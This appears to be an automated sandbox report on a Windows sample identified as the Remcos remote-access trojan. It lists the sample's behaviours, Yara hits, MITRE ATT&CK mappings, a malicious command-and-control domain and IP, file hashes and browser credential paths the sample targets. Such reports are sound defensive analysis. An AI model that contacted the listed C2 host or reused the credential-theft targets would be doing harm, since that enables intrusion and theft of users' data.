                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0041B69E GetComputerNameExW,GetUserNameW,0_2_0041B69E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449210
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

                          Source: Yara match | File source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara match | File source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
                          Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_0040BA4D
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_0040BB6B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: \key3.db 0_2_0040BB6B

                          Remote Access Functionality

                          Source: Yara match | File source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara match | File source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
                          Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: cmd.exe 0_2_0040569A
                          MITRE ATT&CK Matrix (rebuilt from the flattened table, one line per tactic; a number in front of a technique is the count of matching signatures, techniques without a number are the unmatched cells of the matrix)

                          Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses
                          Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure
                          Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
                          Execution: 1 Native API | 12 Command and Scripting Interpreter | 2 Service Execution | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell
                          Persistence: 1 DLL Side-Loading | 1 Windows Service | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
                          Privilege Escalation: 1 DLL Side-Loading | 1 Bypass User Account Control | 1 Access Token Manipulation | 1 Windows Service | 11 Process Injection | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
                          Defense Evasion: 1 Deobfuscate/Decode Files or Information | 2 Obfuscated Files or Information | 1 DLL Side-Loading | 1 Bypass User Account Control | 1 Masquerading | 1 Virtualization/Sandbox Evasion | 1 Access Token Manipulation | 11 Process Injection | HTML Smuggling | Dynamic API Resolution
                          Credential Access: 1 OS Credential Dumping | 211 Input Capture | 2 Credentials In Files | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
                          Discovery: 2 System Time Discovery | 1 Account Discovery | 1 System Service Discovery | 2 File and Directory Discovery | 23 System Information Discovery | 21 Security Software Discovery | 1 Virtualization/Sandbox Evasion | 2 Process Discovery | 1 Application Window Discovery | 1 System Owner/User Discovery
                          Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot
                          Collection: 11 Archive Collected Data | 211 Input Capture | 3 Clipboard Data | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
                          Command and Control: 12 Ingress Tool Transfer | 2 Encrypted Channel | 1 Non-Standard Port | 2 Non-Application Layer Protocol | 22 Application Layer Protocol | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
                          Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                          Impact: 1 System Shutdown/Reboot | 1 Defacement | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement

                          Source | Detection | Scanner | Label | Link
                          17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | 84% | ReversingLabs | Win32.Backdoor.Remcos |
                          17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | 100% | Avira | BDS/Backdoor.Gen |
                          17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | 100% | Joe Sandbox ML | |
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label | Link
                          http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
                          http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          embargogo237.duckdns.org | 94.103.125.196 | true | true | | unknown
                          geoplugin.net | 178.237.33.50 | true | false | | unknown
                          Name | Malicious | Antivirus Detection | Reputation
                          http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                          embargogo237.duckdns.org | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gpX | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp6 | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gpU_ | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/ | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.000000000061F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp% | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp/C | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpSystem32 | 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
94.103.125.196 | embargogo237.duckdns.org | Germany | | 24904 | KWAOOK-NETSARLFR | true
178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1535239
Start date and time: 2024-10-16 18:49:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 39
• Number of non-executed functions: 237
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
Time | Type | Description
12:50:47 | API Interceptor | 6661108x Sleep call for process: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
178.237.33.50 | ge5AHaHgsn.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | YysMIxESRE.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | MARSS-FILTRY_ZW015010024.bat | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | rSOD219ISF-____.scr.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | KULI500796821_PO20000003.vbs | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | na.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Untitled_15-10-04.xls | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
embargogo237.duckdns.org | xCjIO3SCur0S.exe | Get hash | malicious | Remcos | Browse | 185.29.11.23
embargogo237.duckdns.org | UrgenteNotificationRef.cmd | Get hash | malicious | Remcos | Browse | 45.74.19.121
embargogo237.duckdns.org | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | 45.74.19.121
geoplugin.net | ge5AHaHgsn.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | YysMIxESRE.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | MARSS-FILTRY_ZW015010024.bat | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | rSOD219ISF-____.scr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | KULI500796821_PO20000003.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | na.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 178.237.33.50
geoplugin.net | Untitled_15-10-04.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATOM86-ASATOM86NL | ge5AHaHgsn.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | YysMIxESRE.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | MARSS-FILTRY_ZW015010024.bat | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | rSOD219ISF-____.scr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | KULI500796821_PO20000003.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | na.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Untitled_15-10-04.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
KWAOOK-NETSARLFR | r3DGQXicwA.exe | Get hash | malicious | LummaC, RedLine | Browse | 94.103.125.119
KWAOOK-NETSARLFR | r3DGQXicwA.exe | Get hash | malicious | LummaC, MicroClip, RedLine | Browse | 94.103.125.119
KWAOOK-NETSARLFR | skt.mpsl.elf | Get hash | malicious | Mirai | Browse | 81.28.195.134
KWAOOK-NETSARLFR | wRxSDEgnTy.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 94.103.124.89
KWAOOK-NETSARLFR | C8wkUXBAZm.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 94.103.124.89
KWAOOK-NETSARLFR | b3CaTUFeSZ.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 81.28.195.186
KWAOOK-NETSARLFR | LBVJ3OoBHX.elf | Get hash | malicious | Mirai | Browse | 194.147.21.127
KWAOOK-NETSARLFR | HpUy6OymcM.elf | Get hash | malicious | Unknown | Browse | 45.15.62.129
KWAOOK-NETSARLFR | ZgSQ1wUeNR.elf | Get hash | malicious | Mirai | Browse | 81.28.195.135
KWAOOK-NETSARLFR | 24na4fnD86.elf | Get hash | malicious | Gafgyt | Browse | 94.103.124.162
                                            No context
                                            No context
Process: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.3603882199736725
Encrypted: false
SSDEEP: 3:rhlKlM+UlTlfUl1fKlnx5JWRal2Jl+7R0DAlBG45klovDl6v:6lyDUl1Clx5YcIeeDAlOWAv
MD5: 55006D7DD014744B74455D7B1D217086
SHA1: EDFC5F730C62865CB2EBFF49B5B3F773062F048A
SHA-256: 6BFC4F944BC49FE413FF2192BD817C774E0BBD9B3DF338318F0384CC339D55BB
SHA-512: 306BDC44D0E17473BA5E31BDB87ED3326896EAD0452C47749CF4ABF624514F18AA8739588B21ED2CBE8B0501E1FA4CF8B1AFB6C639190AF593463B12B1410BC7
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview: ....[.2.0.2.4./.1.0./.1.6. .1.2.:.5.0.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Process: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
File Type: JSON data
Category: dropped
Size (bytes): 956
Entropy (8bit): 5.016616617248742
Encrypted: false
SSDEEP: 12:tkTLJend66GkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpSdbauKyGX85MEBZvXhNlT3/7l1DYro
MD5: 1E4FEE0935CFE037E19938E3CD301E95
SHA1: E82413E19E9452DD76756D4573752CD97A88EBA1
SHA-256: F9E4D3EC4F8C549EB34DD1A6E88463F20A6A4AF073B00933281546452C025A42
SHA-512: 1422E40D1592516B08D53AE62D98C71CC3C319D9A606234BC1DDF8D16CF9CFD2C0D75921F2E68B6DB8C260DCD5B35C6F80070611170CE741EA872EA993AD3EB2
Malicious: false
Reputation: low
Preview: {. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.601389087591468
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
File size: 494'592 bytes
MD5: 3904babb53d5bbdab7e0785a533a58d7
SHA1: ce1f658c4fec558cd65698c766363f06c876bdbd
SHA256: 73710268628b6e68182c360fb53dc6475b31dacd9f46d05e98c0830019b075aa
SHA512: df691df5c7ac7571d0838065f5bbf088133d690c192dd2b96165e558bc9685a2db8d6946a1e8c3078f1fe96c9f6d9d2dc1a996c7b58b294050cf592dbcb5f52c
SSDEEP: 6144:oTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZXAXkcrHT4:oTlrYw1RUh3NFn+N5WfIQIjbs/ZXMT4
TLSH: 14B49E01BAD1C072D57514300D3AF776EAB8BD201835497B73EA1D5BFE31190A72AAB7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~...~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..
Icon Hash: 95694d05214c1b33
Entrypoint: 0x434a80
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x66F18049 [Mon Sep 23 14:50:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 1389569a3a39186f3eb453b501cfe688
                                            Instruction
                                            call 00007FE42481054Bh
                                            jmp 00007FE42480FF93h
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000324h
                                            push ebx
                                            push esi
                                            push 00000017h
                                            call 00007FE4248327E3h
                                            test eax, eax
                                            je 00007FE424810107h
                                            mov ecx, dword ptr [ebp+08h]
                                            int 29h
                                            xor esi, esi
                                            lea eax, dword ptr [ebp-00000324h]
                                            push 000002CCh
                                            push esi
                                            push eax
                                            mov dword ptr [00471D14h], esi
                                            call 00007FE424812556h
                                            add esp, 0Ch
                                            mov dword ptr [ebp-00000274h], eax
                                            mov dword ptr [ebp-00000278h], ecx
                                            mov dword ptr [ebp-0000027Ch], edx
                                            mov dword ptr [ebp-00000280h], ebx
                                            mov dword ptr [ebp-00000284h], esi
                                            mov dword ptr [ebp-00000288h], edi
                                            mov word ptr [ebp-0000025Ch], ss
                                            mov word ptr [ebp-00000268h], cs
                                            mov word ptr [ebp-0000028Ch], ds
                                            mov word ptr [ebp-00000290h], es
                                            mov word ptr [ebp-00000294h], fs
                                            mov word ptr [ebp-00000298h], gs
                                            pushfd
                                            pop dword ptr [ebp-00000264h]
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [ebp-0000026Ch], eax
                                            lea eax, dword ptr [ebp+04h]
                                            mov dword ptr [ebp-00000260h], eax
                                            mov dword ptr [ebp-00000324h], 00010001h
                                            mov eax, dword ptr [eax-04h]
                                            push 00000050h
                                            mov dword ptr [ebp-00000270h], eax
                                            lea eax, dword ptr [ebp-58h]
                                            push esi
                                            push eax
                                            call 00007FE4248124CDh
                                            Programming Language:
                                            • [C++] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6eeb8 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x79000 | 0x4b4c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e000 | 0x3bc8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6d350 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6d3e4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6d388 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x59000 | 0x500 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x571f5 | 0x57200 | e504ab64b98631753dc227346d757c52 | False | 0.5716379348995696 | data | 6.6273936921798455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x59000 | 0x179dc | 0x17a00 | 03563836e8ba6bd75dd82177f19b0089 | False | 0.5008370535714286 | data | 5.862029025853186 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x71000 | 0x5d44 | 0xe00 | 0eaccffe1cb836994ce5d3ccfb22d4f9 | False | 0.22126116071428573 | data | 3.0035180736120775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x77000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x78000 | 0x230 | 0x400 | 9ca325bce9f8c0342c0381814603584a | False | 0.330078125 | data | 2.3999762503719224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x79000 | 0x4b4c | 0x4c00 | 7754b1bf51c13b80c6011606b2b45e44 | False | 0.2836657072368421 | data | 3.986078171580293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7e000 | 0x3bc8 | 0x3c00 | 047d13d1dd0f82094cdf10f08253441e | False | 0.7640625 | data | 6.723768218094163 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7918c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837
RT_ICON | 0x795f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885
